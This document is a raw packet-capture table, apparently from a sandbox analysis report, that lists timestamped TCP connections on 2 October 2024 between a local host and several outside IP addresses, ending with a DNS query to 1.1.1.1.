                                                                                        Oct 2, 2024 17:15:20.623769999 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.643034935 CEST44349754104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.643114090 CEST44349754104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.643116951 CEST49754443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.643136024 CEST44349754104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.643162966 CEST49754443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.643177986 CEST49754443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.643481016 CEST44349754104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.643523932 CEST49754443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.643614054 CEST44349754104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.643680096 CEST49754443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.643716097 CEST44349754104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.643800020 CEST44349754104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.643840075 CEST49754443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.664068937 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.664186954 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.664233923 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.664242029 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.664364100 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.664390087 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.664428949 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.664436102 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.664530039 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.665023088 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.665393114 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.665450096 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.665458918 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.665467024 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.665501118 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.665507078 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.665616989 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.665657997 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.665663958 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.666280031 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.666323900 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.666330099 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.666410923 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.666460991 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.666465998 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.667115927 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.667140007 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.667169094 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.667175055 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.667212963 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.667222023 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.709325075 CEST49754443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.709353924 CEST44349754104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.711225986 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.711236954 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.717371941 CEST49756443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.717391014 CEST44349756104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.718241930 CEST49759443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:15:20.718295097 CEST4434975935.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.718380928 CEST49759443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:15:20.719468117 CEST49759443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:15:20.719480038 CEST4434975935.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.759123087 CEST49753443192.168.2.4188.114.96.3
                                                                                        Oct 2, 2024 17:15:20.759141922 CEST44349753188.114.96.3192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.764312983 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.764383078 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.764450073 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.764489889 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.764497042 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.764540911 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.764575005 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.764583111 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.764677048 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.764719009 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.764724970 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.765330076 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.765387058 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.765392065 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.765422106 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.765471935 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.765480042 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.765505075 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.765796900 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.765844107 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.765850067 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.766007900 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.766038895 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.766047955 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.766053915 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.766071081 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.766746998 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.766788006 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.766793966 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.766828060 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.766928911 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.766968012 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.767642021 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.767702103 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.767858028 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.767889977 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.767913103 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.767919064 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.767931938 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.767955065 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.768667936 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.768731117 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.768831968 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.768872976 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.855038881 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.855101109 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.855479956 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.855520010 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.855532885 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.855540037 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.855550051 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.855575085 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.855581045 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.855601072 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.855621099 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.856184006 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.856215000 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.856241941 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.856260061 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.856265068 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.856312990 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.857801914 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.857882023 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.857896090 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.857949972 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.858023882 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.858055115 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.858066082 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.858071089 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.858092070 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.858143091 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:20.858211994 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.858669996 CEST49757443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:20.858679056 CEST44349757104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:21.077183962 CEST44349739216.58.206.36192.168.2.4
                                                                                        Oct 2, 2024 17:15:21.077259064 CEST44349739216.58.206.36192.168.2.4
                                                                                        Oct 2, 2024 17:15:21.077429056 CEST49739443192.168.2.4216.58.206.36
                                                                                        Oct 2, 2024 17:15:21.179548979 CEST4434975935.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:21.201539040 CEST49759443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:15:21.201566935 CEST4434975935.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:21.202735901 CEST4434975935.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:21.202934027 CEST49759443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:15:21.223104954 CEST49759443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:15:21.223332882 CEST4434975935.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:21.223562002 CEST49759443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:15:21.223695993 CEST4434975935.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:21.271615982 CEST49759443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:15:21.347091913 CEST4434975935.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:21.347176075 CEST4434975935.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:21.347347975 CEST49759443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:15:21.357171059 CEST49759443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:15:21.357202053 CEST4434975935.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:21.357388020 CEST49739443192.168.2.4216.58.206.36
                                                                                        Oct 2, 2024 17:15:21.357417107 CEST44349739216.58.206.36192.168.2.4
                                                                                        Oct 2, 2024 17:15:21.357739925 CEST49761443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:15:21.357795000 CEST4434976135.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:21.357989073 CEST49761443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:15:21.358196974 CEST49761443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:15:21.358212948 CEST4434976135.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:21.708791971 CEST4972380192.168.2.4199.232.210.172
                                                                                        Oct 2, 2024 17:15:21.714014053 CEST8049723199.232.210.172192.168.2.4
                                                                                        Oct 2, 2024 17:15:21.714076042 CEST4972380192.168.2.4199.232.210.172
                                                                                        Oct 2, 2024 17:15:21.818187952 CEST4434976135.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:21.862622976 CEST49761443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:15:21.946947098 CEST49761443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:15:21.947012901 CEST4434976135.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:21.947601080 CEST4434976135.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:21.971373081 CEST49761443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:15:21.971510887 CEST4434976135.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:21.971757889 CEST49761443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:15:22.019402027 CEST4434976135.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:22.097742081 CEST4434976135.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:22.097846031 CEST4434976135.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:22.097964048 CEST49761443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:15:22.098100901 CEST49761443192.168.2.435.190.80.1
                                                                                        Oct 2, 2024 17:15:22.098124981 CEST4434976135.190.80.1192.168.2.4
                                                                                        Oct 2, 2024 17:15:23.116163969 CEST49764443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:23.116206884 CEST44349764104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:23.116408110 CEST49764443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:23.117204905 CEST49764443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:23.117223024 CEST44349764104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:23.575963974 CEST44349764104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:23.576407909 CEST49764443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:23.576447010 CEST44349764104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:23.576786995 CEST44349764104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:23.580194950 CEST49764443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:23.580259085 CEST44349764104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:23.580343008 CEST49764443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:23.623456955 CEST44349764104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:23.732335091 CEST44349764104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:23.732405901 CEST44349764104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:23.732481003 CEST49764443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:23.746867895 CEST49764443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:23.746922970 CEST44349764104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:23.778662920 CEST49766443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:23.778743982 CEST44349766104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:23.778812885 CEST49766443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:23.779289007 CEST49766443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:23.779325008 CEST44349766104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:24.443859100 CEST44349766104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:24.473231077 CEST49766443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:24.473263025 CEST44349766104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:24.474401951 CEST44349766104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:24.475003004 CEST49766443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:24.475183964 CEST44349766104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:24.477483988 CEST49766443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:24.519401073 CEST44349766104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:24.587899923 CEST44349766104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:24.587996960 CEST44349766104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:24.589387894 CEST49766443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:24.608377934 CEST49766443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:24.608401060 CEST44349766104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:24.735200882 CEST49767443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:24.735259056 CEST44349767104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:24.735346079 CEST49767443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:24.735563040 CEST49767443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:24.735574961 CEST44349767104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:25.210109949 CEST44349767104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:25.227850914 CEST49767443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:25.227910042 CEST44349767104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:25.228595018 CEST44349767104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:25.236571074 CEST49767443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:25.236728907 CEST44349767104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:25.236804008 CEST49767443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:25.279447079 CEST44349767104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:25.357676029 CEST44349767104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:25.357764006 CEST44349767104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:25.357779026 CEST49767443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:25.357819080 CEST49767443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:25.359138966 CEST49767443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:25.359157085 CEST44349767104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:25.894244909 CEST49769443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:25.894304991 CEST44349769104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:25.894362926 CEST49769443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:25.894815922 CEST49769443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:25.894831896 CEST44349769104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:26.372109890 CEST44349769104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:26.477257013 CEST49769443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:26.764206886 CEST49769443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:26.764283895 CEST44349769104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:26.765153885 CEST44349769104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:26.769887924 CEST49769443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:26.770011902 CEST44349769104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:26.770231962 CEST49769443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:26.811402082 CEST44349769104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:26.831293106 CEST49770443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:26.831398964 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:26.831494093 CEST49770443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:26.832879066 CEST49770443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:26.832914114 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:26.878289938 CEST44349769104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:26.878367901 CEST44349769104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:26.878551006 CEST49769443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:27.014045000 CEST49769443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:27.014085054 CEST44349769104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.297611952 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.298114061 CEST49770443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:27.298141956 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.298683882 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.299253941 CEST49770443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:27.299336910 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.299410105 CEST49770443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:27.299494028 CEST49770443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:27.299511909 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.299580097 CEST49770443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:27.299604893 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.551692009 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.551757097 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.551798105 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.551805973 CEST49770443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:27.551835060 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.551872969 CEST49770443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:27.551875114 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.551892996 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.551932096 CEST49770443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:27.552520037 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.552580118 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.552628994 CEST49770443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:27.552634001 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.557606936 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.557693958 CEST49770443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:27.557698011 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.640778065 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.640842915 CEST49770443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:27.640872002 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.640917063 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.640953064 CEST49770443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:27.640958071 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.641500950 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.641541958 CEST49770443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:27.641541958 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.641554117 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.641591072 CEST49770443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:27.641596079 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.642359972 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.642446995 CEST49770443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:27.642451048 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.642469883 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.642504930 CEST49770443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:27.642728090 CEST49770443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:27.642741919 CEST44349770104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.667287111 CEST49771443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:27.667342901 CEST44349771104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:27.667583942 CEST49771443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:27.667921066 CEST49771443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:27.667938948 CEST44349771104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:28.154938936 CEST44349771104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:28.155262947 CEST49771443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:28.155291080 CEST44349771104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:28.155638933 CEST44349771104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:28.156188011 CEST49771443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:28.156251907 CEST44349771104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:28.156389952 CEST49771443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:28.203399897 CEST44349771104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:28.308562994 CEST44349771104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:28.308753014 CEST44349771104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:28.308907986 CEST49771443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:28.310475111 CEST49771443192.168.2.4104.18.94.41
                                                                                        Oct 2, 2024 17:15:28.310491085 CEST44349771104.18.94.41192.168.2.4
                                                                                        Oct 2, 2024 17:15:29.802675009 CEST6032953192.168.2.41.1.1.1
                                                                                        Oct 2, 2024 17:15:29.807569981 CEST53603291.1.1.1192.168.2.4
